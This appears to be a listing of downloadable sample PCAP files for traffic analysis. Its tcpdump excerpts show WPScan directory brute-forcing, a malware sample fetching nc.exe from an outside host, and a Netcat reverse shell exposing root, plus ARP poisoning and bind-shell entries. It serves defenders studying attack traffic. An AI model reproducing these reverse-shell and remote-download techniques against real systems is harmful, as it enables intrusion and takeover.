WPscan WordPress Scan Directory Brute Force PCAP file download Traffic Analysis

2017-06-08 21:59:48.303294 IP 192.168.10.101.42588 > 192.168.10.111.80: Flags [P.], seq 9781:9912, ack 33354, win 105, options [nop,nop,TS val 8431 ecr 1099943], length 131: HTTP: GET /wordpress/_old HTTP/1.1 E…..@.@..M.. e.. o..P………..i……. .. …..GET /wordpress/_old HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: 192.168.10.111 Accept: / 2017-06-08 21:59:48.303330 IP 192.168.10.101.14193 > 192.168.10.111.55: UDP, length 32 E..<“…”….. e.. o7q.7.(1…………………………… 2017-06-08 21:59:48.303429 IP 192.168.10.101.20422 > 192.168.10.111.55: UDP, length 32 E..<“… ….. e.. oO..7.(.|………………………….. 2017-06-08 21:59:48.303527 IP 192.168.10.101.30431 > 192.168.10.111.55: UDP, length 32 E..<“…7….. e.. ov..7.(.b………………………….. 2017-06-08 21:59:48.303556 IP 192.168.10.111.80 > 192.168.10.101.42588: Flags [P.], seq 33354:33807, ack 9912, win 846, options [nop,nop,TS val 1099943 […]

Tekdefense Hackarmoury.com Malware Rootkit NC Reverse Shell Traffic Analysis Sample PCAP file download

2016-09-27 18:49:21.741750 IP 192.168.1.102.51427 > 75.75.75.75.53: 60216+ A? tools.hackarmoury.com. (39) E..Cv…..k@…fKKKK…5./n..8………..tools.hackarmoury.com….. 2016-09-27 18:49:21.830486 IP 192.168.1.102.63294 > 85.119.82.42.80: Flags [S], seq 2438324637, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0 E..4j.@…&q…fUwR*.>.P.U…….. .z…………… 2016-09-27 18:49:21.946139 IP 192.168.1.102.63294 > 85.119.82.42.80: Flags [.], ack 1205265555, win 256, length 0 E..(j.@…&|…fUwR*.>.P.U..G…P….7…….. 2016-09-27 18:49:21.949965 IP 192.168.1.102.63294 > 85.119.82.42.80: Flags [P.], seq 0:86, ack 1, win 256, length 86: HTTP: GET /all_binaries/nc.exe HTTP/1.1 E..~j.@…&%…fUwR*.>.P.U..G…P…….GET /all_binaries/nc.exe HTTP/1.1 User-Agent: AutoIt Host: tools.hackarmoury.com 2016-09-27 18:49:22.107250 IP 192.168.1.102.63294 > 85.119.82.42.80: Flags [.], ack 385, win 255, length 0 E..(j.@…&z…fUwR*.>.P.U..G…P….b…….. 2016-09-27 18:49:33.280161 IP 192.168.1.102.51428 > 75.75.75.75.53: 53720+ A? www.download.windowsupdate.com. (48) E..Lv…..k6…fKKKK…5.8.8………….www.download.windowsupdate.com….. 2016-09-27 […]

Unencrypted Reverse Shell Netcat NC Linux Traffic PCAP file download

Example of a Netcat unencrypted reverse shell on Linux   2016-05-01 23:02:12.930559 IP 192.168.1.100.45222 > 192.168.1.146.4444: Flags [P.], seq 57:96, ack 11, win 229, options [nop,nop,TS val 653200239 ecr 1226323781], length 39 E..[..@.@..D…d…….\0.q.D………….. &..oI.7Euid=0(root) gid=0(root) groups=0(root) 2016-05-01 23:02:12.991630 IP 192.168.1.146.4444 > 192.168.1.100.45222: Flags [.], ack 96, win 259, options [nop,nop,TS val 1226323844 ecr 653200239], length 0 E..4].@…………d.\..D…0.q………… I.7.&..o 2016-05-01 23:02:18.201395 IP 192.168.1.146.4444 > 192.168.1.100.45222: Flags [P.], seq 11:21, ack 96, win 259, options [nop,nop,TS val 1226329053 ecr 653200239], length 10 E..>].@…………d.\..D…0.q…..d…… I.K.&..opwned s0n 2016-05-01 23:02:18.239958 IP 192.168.1.100.45222 > 192.168.1.146.4444: Flags [.], ack 21, win 229, options [nop,nop,TS val 653201567 ecr […]

Networking attack ARP Poison Poisoning traffic sample PCAP file download

Networking attack ARP Poison Poisoning traffic sample PCAP file download Please follow and like us:

Netcat NC NCAT Bind Shell PCAP Example Download

Netcat NC NCAT Bind Shell PCAP Example Download Please follow and like us: